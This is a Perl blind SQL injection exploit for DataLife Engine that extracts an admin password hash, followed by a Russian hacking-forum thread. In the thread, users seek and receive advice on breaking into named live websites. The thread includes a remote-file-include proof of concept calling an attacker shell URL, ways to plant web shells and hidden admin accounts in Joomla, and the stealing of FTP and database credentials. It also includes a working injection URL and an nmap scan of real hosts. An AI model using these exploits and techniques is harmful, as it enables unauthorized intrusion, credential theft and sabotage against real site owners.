print " [~] USERNAME : $name\r\n";
print " [~] PREFIX : $prefix\r\n";
$userid = 0;
print " [~] GET USERID FOR USER \"$name\" ...";
$xpl = LWP::UserAgent->new() or die;
$res = $xpl->get($url.'?subaction=userinfo&user='.$name);
if($res->as_string =~ /do=lastcomments&userid=(\d*)/) { $userid = $1; }
elsif($res->as_string =~ /do=pm&doaction=newpm&user=(\d*)/) { $userid = $1; }
elsif($res->as_string =~ /do=feedback&user=(\d*)/) { $userid = $1; }
if($userid != 0 ) { print " [ DONE ]\r\n"; }
else { print " [ FAILED ]\r\n"; exit(); }
print " [~] USERID : $userid\r\n";
print " [~] SEARCHING PASSWORD ... ";
while(1)
{
if(&found(47,58)==0) { &found(96,103); }
$char = $i;
if ($char=="0")
{
if(length($allchar) > 0){
print qq{\b [ DONE ]
---------------------------------------------------------------
USERNAME : $name
USERID : $userid
PASSHASH : $allchar
---------------------------------------------------------------
};
}
else
{
print "\b[ FAILED ]";
}
exit();
}
else
{
$allchar .= chr($char);
print "\b".chr($char)." ";
}
$s_num++;
}
sub found($$)
{
my $fmin = $_[0];
my $fmax = $_[1];
if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }
$r = int($fmax - ($fmax-$fmin)/2);
$check = "/**/BETWEEN/**/$r/**/AND/**/$fmax";
if ( &check($check) ) { &found($r,$fmax); }
else { &found($fmin,$r); }
}
sub crack($$)
{
my $cmin = $_[0];
my $cmax = $_[1];
$i = $cmin;
while ($i<$cmax)
{
$crcheck = "=$i";
if ( &check($crcheck) ) { return $i; }
$i++;
}
$i = 0;
return $i;
}
sub check($)
{
$n++;
status();
$ccheck = $_[0];
$xpl = LWP::UserAgent->new() or die;
$res = $xpl->get($url.'?subaction=userinfo&user='.$name.'%2527 and ascii(substring((SELECT password FROM '.$prefix.'users WHERE user_id='.$userid.'),'.$s_num.',1))'.$ccheck.'/*');
if($res->as_string =~ /$name<\/td>/) { return 1; }
else { return 0; }
}
sub status()
{
$status = $n % 5;
if($status==0){ print "\b/"; }
if($status==1){ print "\b-"; }
if($status==2){ print "\b\\"; }
if($status==3){ print "\b|"; }
}
sub usage()
{
&head;
print q(
USAGE:
r57datalife.pl [OPTIONS]
OPTIONS:
-u <URL> - path to index.php
-n <USERNAME> - username for bruteforce
-p [prefix] - database prefix
E.G.
r57datalife.pl -u http://server/index.php -n admin
---------------------------------------------------------------
(c)oded by 1dt.w0lf
RST/GHC , http://rst.void.ru , http://ghc.ru
);
exit();
}
sub head()
{
print q(
---------------------------------------------------------------
DataLife Engine sql injection exploit by RST/GHC
---------------------------------------------------------------
);
}
Инфо по серверу:
Interesting ports on utel23.in.ua (213.186.116.12):
Not shown: 982 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.0a
25/tcp open smtp Exim smtpd 4.67
| SMTPcommands: EHLO utel23.in.ua Hello plausible-infringer.volia.net [77.123.192.113], SIZE 31457280, PIPELINING, AUTH PLAIN LOGIN, STARTTLS, 250 HELP
|_ HELP Commands supported:, , AUTH STARTTLS HELO EHLO MAIL RCPT DATA NOOP QUIT RSET HELP
53/tcp open domain ISC BIND 9.5.0-P1
80/tcp open http Apache httpd 1.3.39 ((Unix) mod_ssl/2.8.30 OpenSSL/0.9.8b mod_perl/1.29 FrontPage/5.0.2.2510)
|_ HTML title: \xD4\xE0\xED- \xD1\xE0\xE9\xF2 - TechnoS DarkSwords Official Dealer- \xD2\xE5\xF5\xED\xEE\xF1 \xCE\xF4\xE8\xF6\xE8\xE0\xEB...
110/tcp open pop3 Dovecot DirectAdmin pop3d
|_ POP3 Capabilites: USER CAPA RESP-CODES UIDL PIPELINING STLS TOP SASL(PLAIN)
111/tcp open rpcbind
| rpcinfo:
| 100000 2 111/udp rpcbind
| 100024 1 725/udp status
| 100000 2 111/tcp rpcbind
|_ 100024 1 728/tcp status
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
143/tcp open imap Dovecot DirectAdmin imapd
443/tcp open ssl/http Apache httpd 1.3.39 ((Unix) mod_ssl/2.8.30 OpenSSL/0.9.8b mod_perl/1.29 FrontPage/5.0.2.2510)
|_ SSLv2: server still supports SSLv2
|_ HTML title: Secured Home of dealer.com.ua
445/tcp filtered microsoft-ds
587/tcp open smtp Exim smtpd 4.67
| SMTPcommands: EHLO utel23.in.ua Hello plausible-infringer.volia.net [77.123.192.113], SIZE 31457280, PIPELINING, AUTH PLAIN LOGIN, STARTTLS, 250 HELP
|_ HELP Commands supported:, , AUTH STARTTLS HELO EHLO MAIL RCPT DATA NOOP QUIT RSET HELP
593/tcp filtered http-rpc-epmap
765/tcp open ssh OpenSSH 4.3 (protocol 2.0)
993/tcp open ssl/imap Dovecot DirectAdmin imapd
|_ SSLv2: server still supports SSLv2
995/tcp open ssl/pop3 Dovecot DirectAdmin pop3d
|_ SSLv2: server still supports SSLv2
2222/tcp open http DirectAdmin httpd 1.32.2 (Registered to Besthosting.com.ua)
|_ HTML title: DirectAdmin Login
|_ robots.txt: is empty or has no disallowed entries
3306/tcp open mysql MySQL 5.0.41-community-log
| MySQL Server Information: Protocol: 10
| Version: 5.0.41-community-log
| Thread ID: 7664891
| Some Capabilities: Connect with DB, Compress, Transactions, Secure Connection
| Status: Autocommit
|_ Salt: $RU17^Sf(1[Z0!Tam#_6
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.9 - 2.6.20
Uptime guess: 37.282 days (since Tue Dec 23 04:08:42 2008)
Network Distance: 6 hops
TCP Sequence Prediction: Difficulty=198 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Unix
Заранее благодарен
Доброго времени суток. есть проблема.
Имеется сайт на движке irokez(на локальной машине). Нашел к нему на милворме php-инклуд. вот что там написано:
Vulnerable Code:
+ scripts/gallery.scr.php, line(s) 11-12:
+ -> 11: require_once "{$GLOBALS['PTH']['func']}gallery.func.php";
+ -> 12: require_once "{$GLOBALS['PTH']['classes']}gallery.class.php";
+ Proof Of Concept:
http://[target]/[path]/scripts/gallery.scr.php?GLOBALS[PTH][func]=http://evilsite.com/shell.php?
Я составил ссылку
http://irokez/scripts/gallery.scr.php?GLOBALS[PTH][func]=http://evil/shell.php?command=ipconfig
шелл не сработал... Выдал
Warning: main(gallery.func.php) [function.main]: failed to open stream: No such file or directory in Z:\home\irokez\www\scripts\gallery.scr.php on line 11
Fatal error: main() [function.require]: Failed opening required 'gallery.func.php' (include_path='.;/usr/local/php/PEAR') in Z:\home\irokez\www\scripts\gallery.scr.php on line 11
Что я делаю не так?
register_globals = on или off? для удачной эксплуатации нужно что бы был в on
Jokester
31.01.2009, 13:00
f3d
1)
php.ini
=>allow_url_include = On
=>register_globals = on
2)
Файл http://evil/shell.php существует
3)
Баг не пофикшен
Это условия , при которых должно работать
Проверь всё это
Подскажите можно-ли в joomla (1.5.4 ) имея полный доступ к FTP и к joomle создать там скрытую учетную запись - с правами администратора - но чтобы она в админ панели не светилась. И с помощью нее управлять cms.
Спасибо!
нет. нельзя
f3d
1)
php.ini
=>allow_url_include = On
=>register_globals = on
2)
Файл http://evil/shell.php существует
3)
Баг не пофикшен
Это условия , при которых должно работать
Проверь всё это
Это я проверил в первую очередь. все условия выполнены... Шелл точно есть... ini верно... баг не пофикшен т.к качал ту версию которая указана на милворме...
Мне просто интересно, может это у них ошибка.. и этот способ не работает, а они пабликуют не проверенную инфу...
Подскажите пожалуйста. Дело в том что есть один сайт. И на нем происходит чтото на подобе активации акаунта. Т.е. ты долженн ввести свой логин и пароль там в форму.
Все зашибись работает. Случайно наткнулся на такую вещь. Если повторно активировать аккаунт то MySQL выдает ошибку с логином пасом и мылом...
Database Error (44): Ошибка SQL: Duplicate entry 'Мой логин' for key 2 - INSERT INTO `users` (`email`, `username`, `password`) VALUES ('Мое мыло', 'Мой логин', 'Мой пасс') [ SYSPATH/classes/database/driver/mysql.php, line 347 ]
Source
SYSPATH/classes/database/driver/mysql.php, line 94
Mysql_Result->__construct(FALSE, Resource id #54, TRUE, 'INSERT INTO `users` (`email`, `username`, `password`) VALUES ('Мое мыло', 'Мой логин', 'Мой пасс')')
SYSPATH/classes/database.php, line 256 Database_Driver_Mysql_Core->query('INSERT INTO `users` (`email`, `username`, `password`) VALUES ('Мое мыло', 'Мой логин', 'Мой пасс')')
SYSPATH/classes/database.php, line 870 Database_Core->query('INSERT INTO `users` (`email`, `username`, `password`) VALUES ('Мое мыло', 'Мой логин', 'Мой пасс')')
SYSPATH/classes/orm.php, line 638 Database_Core->insert('users', array ('email' => 'Мое мыло', 'username' => 'Мой логин', 'password' => 'Мой пасс'))
APPPATH/classes/controller/activate.php, line 48 ORM_Core->save() Controller_Activate->index(FALSE)
SYSPATH/classes/kohana.php, line 335 ReflectionMethod->invokeArgs(object Controller_Activate { template => object View { kohana_filename => *PROTECTED*, kohana_filetype => *PROTECTED*, kohana_local_data => *PROTECTED*, kohana_global_data => *PROTECTED* }, corners => *PROTECTED*, styles => *PROTECTED*, cp_links => *PROTECTED*, auto_render => TRUE, input => object Input { use_xss_clean => *PROTECTED*, magic_quotes_gpc => *PROTECTED*, ip_address => , instance => *PROTECTED* } }, array ('id' => FALSE)) Kohana::instance()
SYSPATH/classes/event.php, line 205 call_user_func(array ('Kohana', 'instance'), )
SYSPATH/bootstrap.php, line 65 Event::run('system.execute') DOCROOT/index.php, line 92 require 'SYSPATH/bootstrap.php'
Подскажите возможноли с помощью этой зацепки выудить с сайта бд пользователей? Если да, то подскажите что делать. Весь день читаю различные статьи и ничего покачто не получяается
iSee - даже имея полный доступ? и к БД и к сайту. А если его создвть а потом в страничке админа прописать чтобы не показывал?
ну а можно хоть как-то шелл залить - чтобы потом все править на фтп?
Или прописать учетную запись в ручную, но чтобы админ не видел в панели?
Вообщем как получить контроль над джумлой не ставя в известность админа, имея полный доступ.
Спасибо
Alex-xxx
07.02.2009, 15:59
Я знаю что у хостинга на котором я взломал сайт логин и пароль от фтп и пхпмайадмин одинаковый, у меня есть админка сайта недруга вот мне и нужно из этой админки как нибудь выдрать данные для входа в пхпмайадмин, таким образом я получу доступ и к ftp их сайта! Подскажите как достать этот логин и пароли из админки??? Если нужен шелл... то подскажите какой!
Буду очень благодарен тому кто ответит!
Как витянуть пароли с jos_users если есть SQL-Inj в c om_fire boa rd:
http:// whi teg uard-cl an .ру/component/option,com_fireboa rd/func,fbprofile/task,showprf'[sql]/Itemid,5/userid,78/ ???
Делал так 20union%20select%20passwor d%20from%20jos_users но нет никакого результата
Подскажите как решить проблему JoomFish + Joomla 1.5.6
Такая проблема:
Есть 2 версии русская(по умолчанию) и ангийская. В админке(конфигурация) включил пункты:
"Включить дружеские урлы(для ПС) и использовать Apache mod_rewrite
В русской версии сайт работает нормально. В английской же работает только главная, на остальных же грузится 404 ошибка. Почему так?
Если же отключить дружеские урлы(для ПС) и Apache mod_rewrite то работает нормально
iSee - даже имея полный доступ? и к БД и к сайту. А если его создвть а потом в страничке админа прописать чтобы не показывал?
ну а можно хоть как-то шелл залить - чтобы потом все править на фтп?
Или прописать учетную запись в ручную, но чтобы админ не видел в панели?
Вообщем как получить контроль над джумлой не ставя в известность админа, имея полный доступ.
Спасибо
Залей шелл - у тебя будет доступ к контролю над файлами.
Заходи как админ в админ панель - будет доступ к управлению контентом
Что тебе еще нужно? ты же вроде уже имеешь доступ в администраторскую панель
Как убрать меню которое показывает где я сейчас нахожусь, например:
Главная--Раздел--Подраздел
В админке вижу такую опцию для раздела:
При нажатии открыть в:
-В этом же окне с панель навигации
-Новое окно с навигацией
-Новое окно без навигации
Мне получается нужно "В этом же окне без панели навигации"
Получается что надо лезть в код?
Как удалить это меню из шаблона(где оно вызывается)
Да меню нада удалять из кода а у папки нада удалять документ зависимости от шаблона ! Там модуль удалить нада если я не ошибаюсь !
Да меню нада удалять из кода а у папки нада удалять документ зависимости от шаблона ! Там модуль удалить нада если я не ошибаюсь !
ты ошибся :/
ТС, в темплейте удали mosPathWay и всё :)
блин :/ короче зайди сюда:
joomla/templates/[название твоего темплейта]/
найди там index.php
Там найди <?php mosPathWay(); ?> и сотри.
У меня джумла 1.5.6.
Где єту пеерменную искать? В файле templates/index.php
блин :/ короче зайди сюда:
joomla/templates/[название твоего темплейта]/
найди там index.php
Там найди <?php mosPathWay(); ?> и сотри.
У меня все записи в темплейте такого типа:
<jdoc:include type="modules" name="user1" style="xhtml" />
тогда удали это:
<div id="pathway">
<jdoc:include type="modules" name="breadcrumb" />
</div>
Захожу в статью для редактирования. Адрес в урле такой:
administrator/index.php?option=com_content§ionid=-1&task=edit&cid[]=65
Хочу отредактировать кнопки для загрузки картинки, вставки анонса, и т.д.(которіе находятся по текст ареа)
В каком файле єто все лежит??
Залей шелл и посмотри конфиг подключения к базе данных - там логин и пароль
Скажите плиз имея доступ на фтп можно ли залезть на движок ?
А что это правда,что использование конструктора сайта использовать более безопасней,чем любой движок cms?
Скажите плиз имея доступ на фтп можно ли залезть на движок ?
да, если фтп виден из веб
А что это правда,что использование конструктора сайта использовать более безопасней,чем любой движок cms?
если конструировать будешь на html то безопасно, только есть другие угрозы как ПО или РеверсАЙПИ :(
А вообще,что бы вы посоветовали с той т.з,оправдаются ли мои труды вложенные на конструктор ради безопасности или оно того не стоит?
А вообще,что бы вы посоветовали с той т.з,оправдаются ли мои труды вложенные на конструктор ради безопасности или оно того не стоит?
оно того не стоит... ставь джомлу и крути как хочешь, джумла достаточно безопасный движок, единственное перед тем как ставишь какой-либо компонент, проверь его на багтреке на уязвимость.
оно того не стоит... ставь джомлу и крути как хочешь, джумла достаточно безопасный движок, единственное перед тем как ставишь какой-либо компонент, проверь его на багтреке на уязвимость.
Спасибо
Маркиза - идешь на фтп, потом сливаешь файл конфига - берешь от туда данные для доступа mysql - идешь в mysql - и создаешь нового админа - или берешь хэш старого админа - все ручками - потом идешь в админку и логинишься.
Как то так )
берешь хэш старого админа
прежде чем его взять и логиниться, его нужно расшифровать
it's mу - ну это уже тонкости )) Можно его поменять на хеш уже известного пароля, а потом после "настройки" движка под себя - вернуть обратно.. Вариантов масса - даже без расшифровки ))
вопрос:
как подконнектица к БД MySql зная:
- все данные для доступа
- сайт на дедике
- система FreeBSD 6.1
-m0rgan-
18.02.2009, 18:05
Попробуй с помощью этого скрипта:
<?php
$dbLink = mysql_connect("IP_database", "login", "password")
or die ("oops");
?>
Попробуй с помощью этого скрипта:
<?php
$dbLink = mysql_connect("IP_database", "login", "password")
or die ("oops");
?>
не катит 'oops'
$dbLink = mysql_connect("localhost", "login", "password")
только так
-m0rgan-
18.02.2009, 18:43
подключается?
-m0rgan-
18.02.2009, 18:50
ну вот)
основной скрипт - это $dbLink = mysql_connect("IP_database", "login", "password") а or die ("oops"); это уже дополнительно...
суть в том что при вводе
IP_database= ip servera - коннекта нет
IP_database= 'localhost' - коннект есть
следовательно нужно искать папку phpmyadmin :(
ps скрипт выполняю на серваке
-m0rgan-
18.02.2009, 19:08
суть в том что при вводе
IP_database= ip servera - коннекта нет
IP_database= 'localhost' - коннект есть
Ну так и должно быть!
В принципе можно вписывать и хост БД.
А хост можно узнать черех ф-ю database()
Ну так и должно быть!
В принципе можно вписывать и хост БД.
А хост можно узнать черех ф-ю database()
извиняйте в этом всем я пока нооб :)
еще раз и по порядку:
-прочитал все данные cms для подключения к БД (хост там и есть "localhost" , вроде)
мне нужно подконнектица к БД через интерфейс phpmyadmin желательно удаленно, но удаленно я так понял не пускает
есть ли еще варианты?
ps спс. за терпение :)
-m0rgan-
18.02.2009, 19:29
ты уверен,что там стоит пхп май админ?
извиняйте в этом всем я пока нооб :)
еще раз и по порядку:
-прочитал все данные cms для подключения к БД (хост там и есть "localhost" , вроде)
мне нужно подконнектица к БД через интерфейс phpmyadmin желательно удаленно, но удаленно я так понял не пускает
есть ли еще варианты?
ps спс. за терпение :)
я так понял если ты прочитал сорцы CMS и получил данные для подключения к БД значит у тебя есть доступ к интерфейсу администратора или же доступ FTP? если так, тогда попробуй просто залить какой-нибудь c99shell и собственно через него подключится к БД. А на счет phpmyadmin, его попросту может и не быть, так как это свободнораспространяемое ПО и альтернатив ему куча :) удаленно тебе подключится вряд ли получится так как на большинства серверах удаленное подключение к БД запрещено по умолчанию.
Jokester
19.02.2009, 14:08
ps скрипт выполняю на серваке
Тоесть доступ есть.Ты можешь лить свои скрипты и тебе нужна работа с базой? Заливай любой дампер вбивай данные подключения и наслаждайся.
Как вариант гугл : "RST MySQL"
Тоесть доступ есть.Ты можешь лить свои скрипты и тебе нужна работа с базой? Заливай любой дампер вбивай данные подключения и наслаждайся.
Как вариант гугл : "RST MySQL"
доступ у меня только к админке
попробую залить шелл r57sql
всем спс. за помощь
Кто-нибудь знает, можно ли, имея досутп к БД, подправить какую-нибудь запись XSS-ом, чтобы на главной странице (или лучше в админке) она срабатывала?
это с бд никак не связанно, это баги в обработке js !
это с бд никак не связанно, это баги в обработке js !
Я прекрасно знаю, что такое XXS - joomla включает в главную страницу записи из БД - если там (в БД) будет XSS то она окажется на главной странице. Дошло?
Ericon2009
20.02.2009, 02:10
при наличии работающей скуль инъекции в джумле можно ли ее как нибудь использовать для залива шелла или добавления пользователя с админскими правами?
-m0rgan-
20.02.2009, 03:40
Если есть права, то можно попробовать залить шелл через INTO OUT FILE.
Или получить пассы админки, установить модуль Joomla Explorer и через него залить шелл...
при наличии работающей скуль инъекции в джумле можно ли ее как нибудь использовать для залива шелла или добавления пользователя с админскими правами?
посмотри на примере других сплойтов для жомлы) вытягивается хеш, расшифровывается и юзается уже пароль админа)
всем привет как ломануть этот сайт htt://xaker.1xw.ru срочно надо
в просьбы о взломах)
Ericon2009
21.02.2009, 01:32
посмотри на примере других сплойтов для жомлы) вытягивается хеш, расшифровывается и юзается уже пароль админа)
вот вытянуть то вытянул пока расшифровать не удается - поэтому и мысли в другую сторону, как бы побыстрее сделать тем более, что там хеши с салтом
Ericon2009, посмотри, работает ли там file_priv.
на 80% уверен что нет, но попробовать стоит.
Ericon2009
22.02.2009, 02:34
Ericon2009, посмотри, работает ли там file_priv.
на 80% уверен что нет, но попробовать стоит.
ага спасиб попробую
такой вопрос еще немного ламерский кто нибудь юзал сканер rpvs ? антивир на него сильно ругается и пишет почему то что там троян, а не хактул как обычно на утилиты и сканеры разные
ага спасиб попробую
такой вопрос еще немного ламерский кто нибудь юзал сканер rpvs ? антивир на него сильно ругается и пишет почему то что там троян, а не хактул как обычно на утилиты и сканеры разные
там троян приклеен к сканеру
Ericon2009
23.02.2009, 03:41
там троян приклеен к сканеру
спасибо .. так и подумал .. а он где нибудь прописывается или только при запуске активируется?
зависит от трояна, а тебе не кажется что данный разговор, своей тематикой, выходит за рамки этой темы. так что если тебя беспокоит целостность твоей системы и ты хочешь узнать что-за троян и где он находится, в таком случае предлагаю тебе посетить данный раздел форума: https://forum.antichat.ru/forum80.html
Кто-нибудь может подсказать, каким образом шифруется пароль в поле passwd таблицы nuke_popsettings в php-nuke?
Например: %E3%2FO%84%9BU
Shadow6120
25.02.2009, 17:10
Как можно протроянить сайт на ucoz? оч надо
kutskovasja
26.02.2009, 17:11
Есть сайт на joomla, есть пароль к админской панели. Нет логина. Логин admin не подходит. Помогите узнать логин.
Набор плагинов в движке поидее стандартный. Мот кто знает какую-нибудь sql инъекцию. Подскажите. очень надо.
для примера http://centurytechnologiesuk.org/ я знаю здесь пароль админа. как узнать логин.
смотри в теме с уязвимостями жумлы.
-m0rgan-
26.02.2009, 18:17
Как можно протроянить сайт на ucoz? оч надо
в паблике способов нету...
было только пара пасивок и все...
Они в первую очередь сформировали все силы на защиту своего двига...
kutskovasja
27.02.2009, 02:39
смотри в теме с уязвимостями жумлы.
Смотрел. Там все sql для различных дополнительных плагинов.
А если доп. плагинов не стоит?
Мот через какие стандартные плагины или в темплейтах стандартных есть баг.
Подскажите, кто что знает. :)
Вот два сайта для примера
http://centurytechnologiesuk.org/
http://www.albuquerquepressclub.org/
кто-нибудь сможет узнать логин админа. Если да, то подскажите как.
http://wow-moonlight.com/
Подскажите плиз что там за двиг стоит :). Не одной директории найти не могу :(
Не дле?
DimOnOID
27.02.2009, 10:05
http://wow-moonlight.com/
Подскажите плиз что там за двиг стоит :). Не одной директории найти не могу :(
Не дле?
http://wow-moonlight.com/?news=80+and+substring(version(),1,1)=5&page=0
Это самопис наверное.
phpinfo
http://wow-moonlight.com/inc/phpinfo.php
information_schema.tables
и mysql.users Доступны.действуй.
http://wow-moonlight.com/phpmyadmin/
Shadow6120
27.02.2009, 20:47
Ты меня не так понял, я сказал протроянить, а не взломать, вот статья про протроянивание пхпбб и ипб http://forum.antichat.ru/thread23612-Ipb.html
Как сделать что-то подобное с укозом?
Что имеем:
-2 хеша паролей админов МД5 (которые нигде не подбираются и не находятся)
-уязвимость sql inject
-куки проверяются усложненным методом (учитывается ip и user agent)
вот функция:
function isValid() {
global $db;
$mintime = (time()-$this->expiretime);
$db->query("DELETE FROM ".$db->prefix("session")." WHERE time<$mintime");
$sql = "
SELECT
u.uid,
u.uname,
u.pass,
s.hash
FROM ".$db->prefix("session")." s
INNER JOIN ".$db->prefix("users")." u ON u.uid=s.uid
WHERE s.hash='".$this->sessionID."'";
if ( !$result = $db->query($sql) ) {
return false;
}
list($uid, $uname, $pass, $hash) = $db->fetch_row($result);
if ( !empty($uid) ) {
if ($this->sessionID == md5($uid.':'.$pass.':'._HTTP_USER_AGENT.':'._REMOT E_ADDR)) {
$this->uid = $uid;
$this->uname = $uname;
$this->pass = $pass;
$this->hash = $hash;
return true;
}
}
return false;
}
какие будут предложения?
и возможно ли с помощью sql inject редактировать БД ?
и возможно ли с помощью sql inject редактировать БД ?
в MySql нет.
какие будут предложения?
Если есть возможность покажи как устанавливается значение константы _REMOTE_ADDR.
В некоторых движках попадался примерно такой код:
if (@getenv("HTTP_CLIENT_IP")) {
define('_REMOTE_ADDR', getenv("HTTP_CLIENT_IP"));
} else if (@getenv("HTTP_X_FORWARDED_FOR")) {
define('_REMOTE_ADDR', getenv('HTTP_X_FORWARDED_FOR'));
} else if (@getenv('REMOTE_ADDR')) {
define('_REMOTE_ADDR', getenv('REMOTE_ADDR'));
} else if (isset($_SERVER['REMOTE_ADDR'])) {
define('_REMOTE_ADDR', $_SERVER['REMOTE_ADDR']);
} else {
define('_REMOTE_ADDR', "Unknown");
}
Тогда подменить _REMOTE_ADDR вполне возможно
по-моему этот участок отвечает за присвоение констант
// SERVER followed by ENV comparison :: apache/iis, cgi/isapi :: ..so check'em all :)
!empty($_SERVER['HTTP_HOST']) ? define('_HTTP_HOST' , $_SERVER['HTTP_HOST']) : define('_HTTP_HOST' , $_ENV['HTTP_HOST']);
!empty($_SERVER['QUERY_STRING']) ? define('_QUERY_STRING' , $_SERVER['QUERY_STRING']) : define('_QUERY_STRING' , $_ENV['QUERY_STRING']);
!empty($_SERVER['SCRIPT_NAME']) ? define('_SCRIPT_NAME' , $_SERVER['SCRIPT_NAME']) : define('_SCRIPT_NAME' , $_ENV['SCRIPT_NAME']);
!empty($_SERVER['HTTP_REFERER']) ? define('_HTTP_REFERER' , $_SERVER['HTTP_REFERER']) : define('_HTTP_REFERER' , $_ENV['HTTP_REFERER']);
!empty($_SERVER['REQUEST_METHOD']) ? define('_REQUEST_METHOD' , $_SERVER['REQUEST_METHOD']) : define('_REQUEST_METHOD' , $_ENV['REQUEST_METHOD']);
!empty($_SERVER['HTTP_USER_AGENT']) ? define('_HTTP_USER_AGENT', $_SERVER['HTTP_USER_AGENT']) : define('_HTTP_USER_AGENT', $_ENV['HTTP_USER_AGENT']);
$R_URI = !empty($_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : $_ENV['REQUEST_URI'];
!empty($R_URI) ? define('_REQUEST_URI', $R_URI) : define('_REQUEST_URI', _PHP_SELF.'?'._QUERY_STRING);
// Ordered by priority ..let's fetch that buggers IP
$tmp_ip[1] = $_SERVER['HTTP_X_FORWARDED_FOR'] ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_ENV['HTTP_X_FORWARDED_FOR'];
$tmp_ip[2] = $_SERVER['HTTP_CLIENT_IP'] ? $_SERVER['HTTP_CLIENT_IP'] : $_ENV['HTTP_CLIENT_IP'];
$tmp_ip[3] = $_SERVER['REMOTE_ADDR'] ? $_SERVER['REMOTE_ADDR'] : $_ENV['REMOTE_ADDR'];
Black.Cat
03.03.2009, 18:34
Подскажите пожалуйста хороший готовый движок магазина.. Чтоб понадежнее, пофункциональнее и не дорого (или бесплатно)..
ValentinV
03.03.2009, 20:42
Уважаемые, будьте добры подскажите насколько будет сложным перенести набитый под завязку сайт с БД с ucoz.ru на другой сервер?
многие пишут что это практически не реально.
что думаете вы?
-m0rgan-
03.03.2009, 21:04
ValentinV, сложновато...там есть возможность сделать бекап даных или всего пректа, но онов каком то карявом виде=/
если разберешся с ним, то дерзай)
Black.Cat, имхо phpshop, в нем вроде как залатали наболевшие баги...
ValentinV
03.03.2009, 21:56
ValentinV, сложновато...там есть возможность сделать бекап даных или всего пректа, но онов каком то карявом виде=/
если разберешся с ним, то дерзай)...
есть "полный" бекап из админки движка, но как я понял он не сделал дамп самой БД.
как полностью слить сайт оттуда с базой... я уже незнаю...
очень необходимо переехать
Black.Cat
03.03.2009, 22:46
А vamshop как?.. Слаб?
kutskovasja
07.03.2009, 03:41
Вопрос такой. Есть доступ к админке в joomla 1.5.0 Не могу залить шелл. пробовал через медиа менеджер. не получается выдает ошибку:
JFTP::store: Bad response
WARNFS_ERR02
Error. Unable to upload file
Пробовал через шаблоны. т.е. менял код шаблона. выдает ошибку:
JFTP::write: Bad response
Operation Failed!: failed to open file %s for writing.
Подскажите как залить шел? что за ошибки? и как можно их исправить?
Подскажите, а какую лучше цмску использовать, которая более стабильна и безопасна: джумла, туро, дрюпал?Или еще какая-нибудь?
Подскажите что тут за цмс http://wow.wtgames.ru/ ???
Заранее спс ;) С меня +
-m0rgan-
08.03.2009, 14:48
Самопис скорее всего...
А можно что-нить поконкретней что там еще есть :)
допустим я нашол XSS - http://torg.mail.ru/news/?0103/2009"><script>alert(document.cookie)</script>
Вопрос, как её заносить в ссылку по которой должен отклик от жертвы произойти со скоиптом ("><script>alert(document.cookie)</script>) или без ?????
так и заноси. токо закодируй строку
у меня такой вопрос, может и не в тему.
где могут находятся админские скрипты, т.е. наибольшая вероятность того что они именно там .
иными словами, как стандартный путь обычно выглядит .
я нашел инклуд-баг в скрипте, и могу подключить любой файл (в меру доступности)
только не знаю что подключать .
со своего сайта cкрипт выполнить не получится потому как include(/определ_путь/$параметр_blabla.php)
подскажите если можно
Доброе утро. Вопрос следующий. Есть дырявый сайт, есть залитый мною шелл, можно ли каким то образом сменить владельца файла чтобы я мог его не просто читать, но и редактировать? Или еще лучше скажите где можно посмотреть логин и пароль для ФТП, есть доступ на чтение в папку etc. стоит фриБСД 6*какаято стабл версион.
Спасибо!
dimanqweasdzxc
22.03.2009, 17:37
Добрый день!!
Что такое сплоит и как им пользоваться???
Дай пожалуйста ссыль и подробное описание...
Сплоит нужен для хака движка трекера(TBDEV)...
Заранеее благодарен...
На стартовой страничке есть форма для поиска
Статьи :
Запускаем сплоиты (http://forum.antichat.ru/thread26510.html)
Tbdev (http://forum.antichat.ru/thread79705-tbdev.html)
Эксплоиты (http://www.winzone.ru/articles/286/)
dimanqweasdzxc
22.03.2009, 20:32
Добрый день!!
Что такое XSS и как им пользоваться???
Дай пожалуйста ссыль и подробное описание...
Заранеее благодарен...
Добрый День.
Такой вопрос.
сайт: http://www.pn.by/
движок: http://www.webdirector.ru/ (версию незнаю.)
Вопрос: открыта папка с конфигом http://pn.by/webdirector/core/
Что я могу сделать. И как.
Заранее спасибо!
Предваритольно будет такой доступ всего 2-3 дня.
Ниче ты не сможешь сделать...
heretic1990
23.03.2009, 17:33
Может не по теме, он кто подскажет чем брутить vBulletin (Version 3.6.8) ?
Может не по теме, он кто подскажет чем брутить vBulletin (Version 3.6.8) ?
По 5 паролей в 15 минут? Удачи! :)
P.S. На всех серьёзных двигах защита от брута стоит.
heretic1990
25.03.2009, 21:46
По 5 паролей в 15 минут? Удачи! :)
P.S. На всех серьёзных двигах защита от брута стоит.
мне надо так:
login1:pass
login2:pass
login3:pass
login4:pass
пробовал гидрой, не получается((
Dr.Gonzo
26.03.2009, 12:20
Кто-нибудь может подсказать, что за ерунда:
Уже не первый раз встречается сайт на asp, ссылка вида: http://www.сайт.ru/?p=далее какое-нибудь слово, например news
Подставляешь туда что-нибудь, выдает:
Server Error in '/' Application.
There is no row at position 0.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
Exception Details: System.IndexOutOfRangeException: There is no row at position 0.
Source Error:
Line 1: <%@ Page Language="c#" Debug="true" Codebehind="default.aspx.cs" AutoEventWireup="false" Inherits="бла бла бла" %>
Line 2: <% = GetWebPage() %>
Source File: c:\inetpub\vhosts\сайт.ru\httpdocs\default.asp x Line: 2
Читал статьи по взлому асп, ничего не нашел толкового.
Команды выполнять не дает
подскажите, как залить шелл в SupportSuite
problema
26.03.2009, 16:21
Может не по теме, он кто подскажет чем брутить vBulletin (Version 3.6.8) ?
многопоточным проксевым брутом :( к сожалению в паблике такого ты не найдешь
mailbrush
26.03.2009, 16:28
Еще приватного тоже не видел...
problema
26.03.2009, 17:04
Может не по теме, он кто подскажет чем брутить vBulletin (Version 3.6.8) ?
можешь попробовать это, возможно поможет: http://forum.antichat.ru/thread109600.html
Читал статьи по взлому асп, ничего не нашел толкового.
Команды выполнять не дает
Сколько раз трогал асп, либо MSSQL, либо XML в качестве баз данных.
Подскажите может есть всётаки способ расшифровать КУКИ и узнать пароль скрыты в них ???
problema
26.03.2009, 18:37
